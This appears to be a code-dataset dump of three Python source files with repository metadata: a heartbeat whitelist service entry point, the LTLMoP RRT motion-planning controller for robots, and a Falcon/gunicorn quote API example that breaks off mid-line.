#!/usr/bin/python # -*- coding:utf-8 -*- """ 主程序入口 @author:alex @date:15-2-13 @time:上午11:44  @contact:alexliyu2012@gmail.com """ __author__ = 'alex' import sys import os import ConfigParser import uuid from subprocess import Popen, PIPE from utils.heartbeat import HeartBeatManager from utils.tools import * PROJECT_PATH = os.path.abspath(os.path.dirname(__file__)) def init(ini_file=None): cf = ConfigParser.ConfigParser() try: if ini_file: cf.read(ini_file) else: cf.read(os.path.join(PROJECT_PATH, "config.ini")) redis_host = cf.get("REDIS", "IP") redis_port = cf.getint("REDIS", "PORT") listener_host = cf.get("LISTENING", "IP") listener_port = cf.getint("LISTENING", "PORT") except Exception, e: print e sys.exit(1) print_info("REDIS端口 %s:%d" % (redis_host, redis_port)) print_info("监听心跳包端口 %s:%d" % (listener_host, listener_port)) print_info("开始运行白名单服务........") server = HeartBeatManager(redis_host, redis_port, listener_host, listener_port) server.run() return True if __name__ == "__main__": if len(sys.argv) > 1: init(sys.argv[1]) else: init()
mit
-4,446,706,550,151,536,000
21.62963
83
0.60311
false
jadecastro/LTLMoP
src/lib/handlers/motionControl/RRTController.py
1
37133
#!/usr/bin/env python """ =================================================================== RRTController.py - Rapidly-Exploring Random Trees Motion Controller =================================================================== Uses Rapidly-exploring Random Tree Algorithm to generate paths given the starting position and the goal point. """ from numpy import * from __is_inside import * import math import sys,os from scipy.linalg import norm from numpy.matlib import zeros import __is_inside import time, sys,os import scipy as Sci import scipy.linalg import Polygon, Polygon.IO import Polygon.Utils as PolyUtils import Polygon.Shapes as PolyShapes from math import sqrt, fabs , pi import random import thread import threading # importing matplotlib to show the path if possible try: import matplotlib.pyplot as plt import matplotlib.animation as animation import_matplotlib = True except: print "matplotlib is not imported. Plotting is disabled" import_matplotlib = False class motionControlHandler: def __init__(self, proj, shared_data,robot_type,max_angle_goal,max_angle_overlap,plotting): """ Rapidly-Exploring Random Trees alogorithm motion planning controller robot_type (int): Which robot is used for execution. BasicSim is 1, ODE is 2, ROS is 3, Nao is 4, Pioneer is 5(default=1) max_angle_goal (float): The biggest difference in angle between the new node and the goal point that is acceptable. If it is bigger than the max_angle, the new node will not be connected to the goal point. The value should be within 0 to 6.28 = 2*pi. Default set to 6.28 = 2*pi (default=6.28) max_angle_overlap (float): difference in angle allowed for two nodes overlapping each other. If you don't want any node overlapping with each other, put in 2*pi = 6.28. Default set to 1.57 = pi/2 (default=1.57) plotting (bool): Check the box to enable plotting. Uncheck to disable plotting (default=True) """ self.system_print = False # for debugging. print on GUI ( a bunch of stuffs) self.finish_print = False # set to 1 to print the original finished E and V before trimming the tree self.orientation_print = False # show the orientation information of the robot # Get references to handlers we'll need to communicate with self.drive_handler = proj.h_instance['drive'] self.pose_handler = proj.h_instance['pose'] # Get information about regions self.proj = proj self.coordmap_map2lab = proj.coordmap_map2lab self.coordmap_lab2map = proj.coordmap_lab2map self.last_warning = 0 self.previous_next_reg = None # Store the Rapidly-Exploring Random Tress Built self.RRT_V = None # array containing all the points on the RRT Tree self.RRT_E = None # array specifying the connection of points on the Tree self.E_current_column = None # the current column on the tree (to find the current heading point) self.Velocity = None self.currentRegionPoly = None self.nextRegionPoly = None self.map = {} self.all = Polygon.Polygon() self.trans_matrix = mat([[0,1],[-1,0]]) # transformation matrix for find the normal to the vector self.stuck_thres = 20 # threshold for changing the range of sampling omega # Information about the robot (default set to ODE) if robot_type not in [1,2,3,4,5]: robot_type = 1 self.system = robot_type # Information about maximum turning angle allowed from the latest node to the goal point if max_angle_goal > 2*pi: max_angle_goal = 2*pi if max_angle_goal < 0: max_angle_goal = 0 self.max_angle_allowed = max_angle_goal # Information about maximum difference in angle allowed between two overlapping nodes if max_angle_overlap > 2*pi: max_angle_overlap = 2*pi if max_angle_overlap < 0: max_angle_overlap = 0 self.max_angle_overlap = max_angle_overlap # Information about whether plotting is enabled. if plotting is True and import_matplotlib == True: self.plotting = True else: self.plotting = False # Specify the size of the robot # 1: basicSim; 2: ODE; 3: ROS 4: Nao; 5: Pioneer # self.radius: radius of the robot # self.timestep : number of linear segments to break the curve into for calculation of x, y position # self.step_size : the length of each step for connection to goal point # self.velocity : Velocity of the robot in m/s in control space (m/s) if self.system == 1: self.radius = 5 self.step_size = 25 self.timeStep = 10 self.velocity = 2 # 1.5 if self.system == 2: self.radius = 5 self.step_size = 15 self.timeStep = 10 self.velocity = 2 # 1.5 elif self.system == 3: self.ROSInitHandler = shared_data['ROS_INIT_HANDLER'] self.radius = self.ROSInitHandler.robotPhysicalWidth/2 self.step_size = self.radius*3 #0.2 self.timeStep = 8 self.velocity = self.radius/2 #0.08 elif self.system == 4: self.radius = 0.15*1.2 self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4 self.timeStep = 5 self.velocity = 0.05 elif self.system == 5: self.radius = 0.15 self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4 self.timeStep = 5 self.velocity = 0.05 # Operate_system (int): Which operating system is used for execution. # Ubuntu and Mac is 1, Windows is 2 if sys.platform in ['win32', 'cygwin']: self.operate_system = 2 else: self.operate_system = 1 if self.system_print == True: print "The operate_system is "+ str(self.operate_system) # Generate polygon for regions in the map for region in self.proj.rfi.regions: self.map[region.name] = self.createRegionPolygon(region) for n in range(len(region.holeList)): # no of holes self.map[region.name] -= self.createRegionPolygon(region,n) # Generate the boundary polygon for regionName,regionPoly in self.map.iteritems(): self.all += regionPoly # Start plotting if operating in Windows if self.operate_system == 2 and self.plotting ==True: # start using anmination to plot the robot self.fig = plt.figure() self.ax = self.fig.add_subplot(111) self.scope = _Scope(self.ax,self) thread.start_new_thread(self.jplot,()) def gotoRegion(self, current_reg, next_reg, last=False): """ If ``last`` is True, we will move to the center of the destination region. Returns ``True`` if we've reached the destination region. """ if current_reg == next_reg and not last: # No need to move! self.drive_handler.setVelocity(0, 0) # So let's stop return True # Find our current configuration pose = self.pose_handler.getPose() # Check if Vicon has cut out # TODO: this should probably go in posehandler? if math.isnan(pose[2]): print "WARNING: No Vicon data! Pausing." self.drive_handler.setVelocity(0, 0) # So let's stop time.sleep(1) return False ###This part will be run when the robot goes to a new region, otherwise, the original tree will be used. if not self.previous_next_reg == next_reg: # Entered a new region. New tree should be formed. self.nextRegionPoly = self.map[self.proj.rfi.regions[next_reg].name] self.currentRegionPoly = self.map[self.proj.rfi.regions[current_reg].name] if self.system_print == True: print "next Region is " + str(self.proj.rfi.regions[next_reg].name) print "Current Region is " + str(self.proj.rfi.regions[current_reg].name) #set to zero velocity before tree is generated self.drive_handler.setVelocity(0, 0) if last: transFace = None else: # Determine the mid points on the faces connecting to the next region (one goal point will be picked among all the mid points later in buildTree) transFace = None q_gBundle = [[],[]] # list of goal points (midpoints of transition faces) face_normal = [[],[]] # normal of the trnasition faces for i in range(len(self.proj.rfi.transitions[current_reg][next_reg])): pointArray_transface = [x for x in self.proj.rfi.transitions[current_reg][next_reg][i]] transFace = asarray(map(self.coordmap_map2lab,pointArray_transface)) bundle_x = (transFace[0,0] +transFace[1,0])/2 #mid-point coordinate x bundle_y = (transFace[0,1] +transFace[1,1])/2 #mid-point coordinate y q_gBundle = hstack((q_gBundle,vstack((bundle_x,bundle_y)))) #find the normal vector to the face face = transFace[0,:] - transFace[1,:] distance_face = norm(face) normal = face/distance_face * self.trans_matrix face_normal = hstack((face_normal,vstack((normal[0,0],normal[0,1])))) if transFace is None: print "ERROR: Unable to find transition face between regions %s and %s. Please check the decomposition (try viewing projectname_decomposed.regions in RegionEditor or a text editor)." % (self.proj.rfi.regions[current_reg].name, self.proj.rfi.regions[next_reg].name) # Run algorithm to build the Rapid-Exploring Random Trees self.RRT_V = None self.RRT_E = None # For plotting if self.operate_system == 2: if self.plotting == True: self.ax.cla() else: self.ax = None else: self.ax = None if self.operate_system == 1 and self.plotting == True: plt.cla() self.plotMap(self.map) plt.plot(pose[0],pose[1],'ko') self.RRT_V,self.RRT_E,self.E_current_column = self.buildTree(\ [pose[0], pose[1]],pose[2],self.currentRegionPoly, self.nextRegionPoly,q_gBundle,face_normal) """ # map the lab coordinates back to pixels V_tosend = array(mat(self.RRT_V[1:,:])).T V_tosend = map(self.coordmap_lab2map, V_tosend) V_tosend = mat(V_tosend).T s = 'RRT:E'+"["+str(list(self.RRT_E[0]))+","+str(list(self.RRT_E[1]))+"]"+':V'+"["+str(list(self.RRT_V[0]))+","+str(list(V_tosend[0]))+","+str(list(V_tosend[1]))+"]"+':T'+"["+str(list(q_gBundle[0]))+","+str(list(q_gBundle[1]))+"]" #print s """ # Run algorithm to find a velocity vector (global frame) to take the robot to the next region self.Velocity = self.getVelocity([pose[0], pose[1]], self.RRT_V,self.RRT_E) #self.Node = self.getNode([pose[0], pose[1]], self.RRT_V,self.RRT_E) self.previous_next_reg = next_reg # Pass this desired velocity on to the drive handler self.drive_handler.setVelocity(self.Velocity[0,0], self.Velocity[1,0], pose[2]) #self.drive_handler.setVelocity(self.Node[0,0], self.Node[1,0], pose[2]) RobotPoly = Polygon.Shapes.Circle(self.radius,(pose[0],pose[1])) # check if robot is inside the current region departed = not self.currentRegionPoly.overlaps(RobotPoly) arrived = self.nextRegionPoly.covers(RobotPoly) if departed and (not arrived) and (time.time()-self.last_warning) > 0.5: # Figure out what region we think we stumbled into for r in self.proj.rfi.regions: pointArray = [self.coordmap_map2lab(x) for x in r.getPoints()] vertices = mat(pointArray).T if is_inside([pose[0], pose[1]], vertices): print "I think I'm in " + r.name print pose break self.last_warning = time.time() #print "arrived:"+str(arrived) return arrived def createRegionPolygon(self,region,hole = None): """ This function takes in the region points and make it a Polygon. """ if hole == None: pointArray = [x for x in region.getPoints()] else: pointArray = [x for x in region.getPoints(hole_id = hole)] pointArray = map(self.coordmap_map2lab, pointArray) regionPoints = [(pt[0],pt[1]) for pt in pointArray] formedPolygon= Polygon.Polygon(regionPoints) return formedPolygon def getVelocity(self,p, V, E, last=False): """ This function calculates the velocity for the robot with RRT. The inputs are (given in order): p = the current x-y position of the robot E = edges of the tree (2 x No. of nodes on the tree) V = points of the tree (2 x No. of vertices) last = True, if the current region is the last region = False, if the current region is NOT the last region """ pose = mat(p).T #dis_cur = distance between current position and the next point dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose heading = E[1,self.E_current_column] # index of the current heading point on the tree if norm(dis_cur) < 1.5*self.radius: # go to next point if not heading == shape(V)[1]-1: self.E_current_column = self.E_current_column + 1 dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose #else: # dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- vstack((V[1,E[0,self.E_current_column]],V[2,E[0,self.E_current_column]])) Vel = zeros([2,1]) Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER return Vel def getNode(self,p, V, E, last=False): """ This function calculates the velocity for the robot with RRT. The inputs are (given in order): p = the current x-y position of the robot E = edges of the tree (2 x No. of nodes on the tree) V = points of the tree (2 x No. of vertices) last = True, if the current region is the last region = False, if the current region is NOT the last region """ pose = mat(p).T #dis_cur = distance between current position and the next point dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose heading = E[1,self.E_current_column] # index of the current heading point on the tree if norm(dis_cur) < 1.5*self.radius: # go to next point if not heading == shape(V)[1]-1: self.E_current_column = self.E_current_column + 1 dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose Node = zeros([2,1]) Node[0,0] = V[1,E[1,self.E_current_column]] Node[1,0] = V[2,E[1,self.E_current_column]] #Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER return Node def buildTree(self,p,theta,regionPoly,nextRegionPoly,q_gBundle,face_normal, last=False): """ This function builds the RRT tree. p : x,y position of the robot theta : current orientation of the robot regionPoly : current region polygon nextRegionPoly : next region polygon q_gBundle : coordinates of q_goals that the robot can reach face_normal : the normal vector of each face corresponding to each goal point in q_gBundle """ q_init = mat(p).T V = vstack((0,q_init)) theta = self.orientation_bound(theta) V_theta = array([theta]) #!!! CONTROL SPACE: generate a list of omega for random sampling omegaLowerBound = -math.pi/20 # upper bound for the value of omega omegaUpperBound = math.pi/20 # lower bound for the value of omega omegaNoOfSteps = 20 self.omega_range = linspace(omegaLowerBound,omegaUpperBound,omegaNoOfSteps) self.omega_range_escape = linspace(omegaLowerBound*4,omegaUpperBound*4,omegaNoOfSteps*4) # range used when stuck > stuck_thres regionPolyOld = Polygon.Polygon(regionPoly) regionPoly += PolyShapes.Circle(self.radius*2.5,(q_init[0,0],q_init[1,0])) # check faces of the current region for goal points E = [[],[]] # the tree matrix Other = [[],[]] path = False # if path formed then = 1 stuck = 0 # count for changing the range of sampling omega append_after_latest_node = False # append new nodes to the latest node if self.system_print == True: print "plotting in buildTree is " + str(self.plotting) if self.plotting == True: if not plt.isinteractive(): plt.ion() plt.hold(True) while not path: #step -1: try connection to q_goal (generate path to goal) i = 0 if self.system_print == True: print "Try Connection to the goal points" # pushing possible q_goals into the current region (ensure path is covered by the current region polygon) q_pass = [[],[],[]] q_pass_dist = [] q_gBundle = mat(q_gBundle) face_normal = mat(face_normal) while i < q_gBundle.shape[1]: q_g_original = q_gBundle[:,i] q_g = q_gBundle[:,i]+face_normal[:,i]*1.5*self.radius ##original 2*self.radius #q_g = q_gBundle[:,i]+(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius if not regionPolyOld.isInside(q_g[0],q_g[1]): #q_g = q_gBundle[:,i]-(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius q_g = q_gBundle[:,i]-face_normal[:,i]*1.5*self.radius ##original 2*self.radius #forming polygon for path checking EdgePolyGoal = PolyShapes.Circle(self.radius,(q_g[0,0],q_g[1,0])) + PolyShapes.Circle(self.radius,(V[1,shape(V)[1]-1],V[2:,shape(V)[1]-1])) EdgePolyGoal = PolyUtils.convexHull(EdgePolyGoal) dist = norm(q_g - V[1:,shape(V)[1]-1]) #check connection to goal connect_goal = regionPoly.covers(EdgePolyGoal) #check coverage of path from new point to goal # compare orientation difference thetaPrev = V_theta[shape(V)[1]-1] theta_orientation = abs(arctan((q_g[1,0]- V[2,shape(V)[1]-1])/(q_g[0,0]- V[1,shape(V)[1]-1]))) if q_g[1,0] > V[2,shape(V)[1]-1]: if q_g[0,0] < V[1,shape(V)[1]-1]: # second quadrant theta_orientation = pi - theta_orientation elif q_g[0,0] > V[1,shape(V)[1]-1]: # first quadrant theta_orientation = theta_orientation elif q_g[1,0] < V[2,shape(V)[1]-1]: if q_g[0,0] < V[1,shape(V)[1]-1]: #third quadrant theta_orientation = pi + theta_orientation elif q_g[0,0] > V[1,shape(V)[1]-1]: # foruth quadrant theta_orientation = 2*pi - theta_orientation # check the angle between vector(new goal to goal_original ) and vector( latest node to new goal) Goal_to_GoalOriginal = q_g_original - q_g LatestNode_to_Goal = q_g - V[1:,shape(V)[1]-1] Angle_Goal_LatestNode= arccos(vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))/norm(Goal_to_GoalOriginal)/norm(LatestNode_to_Goal)) # if connection to goal can be established and the max change in orientation of the robot is smaller than max_angle, tree is said to be completed. if self.orientation_print == True: print "theta_orientation is " + str(theta_orientation) print "thetaPrev is " + str(thetaPrev) print "(theta_orientation - thetaPrev) is " + str(abs(theta_orientation - thetaPrev)) print "self.max_angle_allowed is " + str(self.max_angle_allowed) print "abs(theta_orientation - thetaPrev) < self.max_angle_allowed" + str(abs(theta_orientation - thetaPrev) < self.max_angle_allowed) print"Goal_to_GoalOriginal: " + str( array(Goal_to_GoalOriginal)) + "; LatestNode_to_Goal: " + str( array(LatestNode_to_Goal)) print vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal)) print "Angle_Goal_LatestNode" + str(Angle_Goal_LatestNode) if connect_goal and (abs(theta_orientation - thetaPrev) < self.max_angle_allowed) and (Angle_Goal_LatestNode < self.max_angle_allowed): path = True q_pass = hstack((q_pass,vstack((i,q_g)))) q_pass_dist = hstack((q_pass_dist,dist)) i = i + 1 if self.system_print == True: print "checked goal points" self.E = E self.V = V # connection to goal has established # Obtain the closest goal point that path can be formed. if path: if shape(q_pass_dist)[0] == 1: cols = 0 else: (cols,) = nonzero(q_pass_dist == min(q_pass_dist)) cols = asarray(cols)[0] q_g = q_pass[1:,cols] """ q_g = q_g-(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*3*self.radius #org 3 if not nextRegionPoly.isInside(q_g[0],q_g[1]): q_g = q_g+(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*6*self.radius #org 3 """ if self.plotting == True : if self.operate_system == 1: plt.suptitle('Rapidly-exploring Random Tree', fontsize=12) plt.xlabel('x') plt.ylabel('y') if shape(V)[1] <= 2: plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b') else: plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b') plt.plot(q_g[0,0],q_g[1,0],'ko') plt.figure(1).canvas.draw() else: BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly)) self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k') if shape(V)[1] <= 2: self.ax.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b') else: self.ax.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b') self.ax.plot(q_g[0,0],q_g[1,0],'ko') # trim the path connecting current node to goal point into pieces if the path is too long now numOfPoint = floor(norm(V[1:,shape(V)[1]-1]- q_g)/self.step_size) if numOfPoint < 3: numOfPoint = 3 x = linspace( V[1,shape(V)[1]-1], q_g[0,0], numOfPoint ) y = linspace( V[2,shape(V)[1]-1], q_g[1,0], numOfPoint ) for i in range(x.shape[0]): if i != 0: V = hstack((V,vstack((shape(V)[1],x[i],y[i])))) E = hstack((E,vstack((shape(V)[1]-2,shape(V)[1]-1)))) #push the goal point to the next region q_g = q_g+face_normal[:,q_pass[0,cols]]*3*self.radius ##original 2*self.radius if not nextRegionPoly.isInside(q_g[0],q_g[1]): q_g = q_g-face_normal[:,q_pass[0,cols]]*6*self.radius ##original 2*self.radius V = hstack((V,vstack((shape(V)[1],q_g[0,0],q_g[1,0])))) E = hstack((E,vstack((shape(V)[1]-2 ,shape(V)[1]-1)))) if self.plotting == True : if self.operate_system == 1: plt.plot(q_g[0,0],q_g[1,0],'ko') plt.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b') plt.figure(1).canvas.draw() else: self.ax.plot(q_g[0,0],q_g[1,0],'ko') self.ax.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b') # path is not formed, try to append points onto the tree if not path: # connection_to_tree : connection to the tree is successful if append_after_latest_node: V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode(V,V_theta,E,Other,regionPoly,stuck, append_after_latest_node) else: connection_to_tree = False while not connection_to_tree: V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode (V,V_theta,E,Other,regionPoly,stuck) if self.finish_print: print 'Here is the V matrix:', V, 'Here is the E matrix:',E print >>sys.__stdout__, 'Here is the V matrix:\n', V, '\nHere is the E matrix:\n',E #B: trim to a single path single = 0 while single == 0: trim = 0 for j in range(shape(V)[1]-3): (row,col) = nonzero(E == j+1) if len(col) == 1: E = delete(E, col[0], 1) trim = 1 if trim == 0: single = 1; ####print with matlib if self.plotting ==True : if self.operate_system == 1: plt.plot(V[1,:],V[2,:],'b') for i in range(shape(E)[1]): plt.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12) plt.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12) plt.figure(1).canvas.draw() else: BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly)) self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k') self.ax.plot(V[1,:],V[2,:],'b') for i in range(shape(E)[1]): self.ax.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12) self.ax.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12) #return V, E, and the current node number on the tree V = array(V) return V, E, 0 def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False): """ Generate a new node on the current tree matrix V : the node matrix V_theta : the orientation matrix E : the tree matrix (or edge matrix) Other : the matrix containing the velocity and angular velocity(omega) information regionPoly: the polygon of current region stuck : count on the number of times failed to generate new node append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful) """ if self.system_print == True: print "In control space generating path,stuck = " + str(stuck) connection_to_tree = False # True when connection to the tree is successful if stuck > self.stuck_thres: # increase the range of omega since path cannot ge generated omega = random.choice(self.omega_range_escape) else: #!!!! CONTROL SPACE STEP 1 - generate random omega omega = random.choice(self.omega_range) #!!!! CONTROL SPACE STEP 2 - pick a random point on the tree if append_after_latest_node: tree_index = shape(V)[1]-1 else: if random.choice([1,2]) == 1: tree_index = random.choice(array(V[0])[0]) else: tree_index = shape(V)[1]-1 xPrev = V[1,tree_index] yPrev = V[2,tree_index] thetaPrev = V_theta[tree_index] j = 1 #!!!! CONTROL SPACE STEP 3 - Check path of the robot path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev)) while j <= self.timeStep: xOrg = xPrev yOrg = yPrev xPrev = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev)) yPrev = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev)) thetaPrev = omega* 1 + thetaPrev path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev)) j = j + 1 thetaPrev = self.orientation_bound(thetaPrev) path_all = PolyUtils.convexHull(path_robot) in_bound = regionPoly.covers(path_all) """ # plotting if plotting == True: self.plotPoly(path_all,'r',1) """ stuck = stuck + 1 if in_bound: robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev)) # check how many nodes on the tree does the new node overlaps with nodes_overlap_count = 0 for k in range(shape(V)[1]-1): robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k])) if robot_new_node.overlaps(robot_old_node): if abs(thetaPrev - V_theta[k]) < self.max_angle_overlap: nodes_overlap_count += 1 if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500): if stuck > self.stuck_thres+1: append_after_latest_node = False if (stuck > self.stuck_thres+500): stuck = 0 stuck = stuck - 20 # plotting if self.plotting == True: self.plotPoly(path_all,'b',1) if self.system_print == True: print "node connected" V = hstack((V,vstack((shape(V)[1],xPrev,yPrev)))) V_theta = hstack((V_theta,thetaPrev)) E = hstack((E,vstack((tree_index ,shape(V)[1]-1)))) Other = hstack((Other,vstack((self.velocity,omega)))) ##################### E should add omega and velocity connection_to_tree = True append_after_latest_node = True else: append_after_latest_node = False if self.system_print == True: print "node not connected. check goal point" else: append_after_latest_node = False return V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree def orientation_bound(self,theta): """ make sure the returned angle is between 0 to 2*pi """ while theta > 2*pi or theta < 0: if theta > 2*pi: theta = theta - 2*pi else: theta = theta + 2*pi return theta def plotMap(self,mappedRegions): """ Plotting regions and obstacles with matplotlib.pyplot number: figure number (see on top) """ #if not plt.isinteractive(): # plt.ion() #plt.hold(True) if self.operate_system == 1: for regionName,regionPoly in mappedRegions.iteritems(): self.plotPoly(regionPoly,'k') plt.figure(1).canvas.draw() def plotPoly(self,c,string,w = 1): """ Plot polygons inside the boundary c = polygon to be plotted with matlabplot string = string that specify color w = width of the line plotting """ if bool(c): for i in range(len(c)): #toPlot = Polygon.Polygon(c.contour(i)) toPlot = Polygon.Polygon(c.contour(i)) & self.all if bool(toPlot): for j in range(len(toPlot)): #BoundPolyPoints = asarray(PolyUtils.pointList(toPlot.contour(j))) BoundPolyPoints = asarray(PolyUtils.pointList(Polygon.Polygon(toPlot.contour(j)))) if self.operate_system == 2: self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w) self.ax.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w) else: plt.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w) plt.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w) plt.figure(1).canvas.draw() def data_gen(self): #self.ax.cla() for regionName,regionPoly in self.map.iteritems(): self.plotPoly(regionPoly,'k') """ #for i in range(len(self.V)): if shape(V)[1] <= 2: plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b') else: plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b') self.plotPoly(self.realRobot, 'r') self.plotPoly(self.robot, 'b') """ pose = self.pose_handler.getPose() self.ax.plot(pose[0],pose[1],'bo') """ self.ax.plot(self.q_g[0],self.q_g[1],'ro') self.plotPoly(self.overlap,'g') self.plotPoly(self.m_line,'b') """ yield(pose[0],pose[1]) """ self.ax.plot(self.prev_follow[0],self.prev_follow[1],'ko') """ def jplot(self): ani = animation.FuncAnimation(self.fig, self.scope.update, self.data_gen) plt.show() class _Scope: def __init__(self, ax, motion, maxt=2, dt=0.02): self.i = 0 self.ax = ax self.line, = self.ax.plot(1) self.ax.set_ylim(0, 1) self.motion = motion def update(self,data): (data1) = self.motion.data_gen() a = data1.next() self.line.set_data(a) self.ax.relim() self.ax.autoscale() return self.line,
gpl-3.0
-7,881,769,386,482,705,000
45.484655
300
0.529798
false
conda/kapsel
examples/quote_api/quote.py
1
4575
from argparse import ArgumentParser import falcon import gunicorn.app.base import json import multiprocessing import sys # A Falcon resource that returns the same quote every time class QuoteResource(object): def on_get(self, req, resp): """Handles GET requests""" quote = {'quote': 'I\'ve always been more interested in the future than in the past.', 'author': 'Grace Hopper'} resp.body = json.dumps(quote) # A Falcon resource that explains what this server is class IndexResource(object): def __init__(self, prefix): self.prefix = prefix def on_get(self, req, resp): """Handles GET requests""" resp.body = """ <html> <head> <title>Quote API Server</title> </head> <body> <p>This is a toy JSON API server example.</p> <p>Make a GET request to <a href="%s/quote">%s/quote</a></p> </body> </html> """ % (self.prefix, self.prefix) resp.content_type = "text/html" resp.status = falcon.HTTP_200 # A Falcon middleware to implement validation of the Host header in requests class HostFilter(object): def __init__(self, hosts): # falcon strips the port out of req.host, even if it isn't 80. # This is probably a bug in Falcon, so we work around it here. self.hosts = [falcon.util.uri.parse_host(host)[0] for host in hosts] def process_request(self, req, resp): # req.host has the port stripped from what the browser # sent us, even when it isn't 80, which is probably a bug # in Falcon. We deal with that in __init__ by removing # ports from self.hosts. if req.host not in self.hosts: print("Attempted request with Host header '%s' denied" % req.host) raise falcon.HTTPForbidden("Bad Host header", "Cannot connect via the provided hostname") # the gunicorn application class QuoteApplication(gunicorn.app.base.BaseApplication): def __init__(self, port, prefix, hosts): assert prefix is not None assert port is not None self.application = falcon.API(middleware=HostFilter(hosts)) # add_route is pedantic about this if prefix != '' and not prefix.startswith("/"): prefix = "/" + prefix self.application.add_route(prefix + '/quote', QuoteResource()) self.application.add_route(prefix + "/", IndexResource(prefix)) self.port = port super(QuoteApplication, self).__init__() print("Only connections via these hosts are allowed: " + repr(hosts)) print("Starting API server. Try http://localhost:%s%s" % (self.port, prefix + '/quote')) def load_config(self): # Note that --kapsel-host is NOT this address; it is NOT # the address to listen on. --kapsel-host specifies the # allowed values of the Host header in an http request, # which is totally different. Another way to put it is # that --kapsel-host is the public hostname:port browsers will # be connecting to. self.cfg.set('bind', '%s:%s' % ('0.0.0.0', self.port)) self.cfg.set('workers', (multiprocessing.cpu_count() * 2) + 1) def load(self): return self.application # arg parser for the standard kapsel options parser = ArgumentParser(prog="quote-api", description="API server that returns a quote.") parser.add_argument('--kapsel-host', action='append', help='Hostname to allow in requests') parser.add_argument('--kapsel-no-browser', action='store_true', default=False, help='Disable opening in a browser') parser.add_argument('--kapsel-use-xheaders', action='store_true', default=False, help='Trust X-headers from reverse proxy') parser.add_argument('--kapsel-url-prefix', action='store', default='', help='Prefix in front of urls') parser.add_argument('--kapsel-port', action='store', default='8080', help='Port to listen on') parser.add_argument('--kapsel-iframe-hosts', action='append', help='Space-separated hosts which can embed us in an iframe per our Content-Security-Policy') if __name__ == '__main__': # This app accepts but ignores --kapsel-no-browser because we never bother to open a browser, # and accepts but ignores --kapsel-iframe-hosts since iframing an API makes no sense. args = parser.parse_args(sys.argv[1:]) if not args.kapsel_host: args.kapsel_host = ['localhost:' + 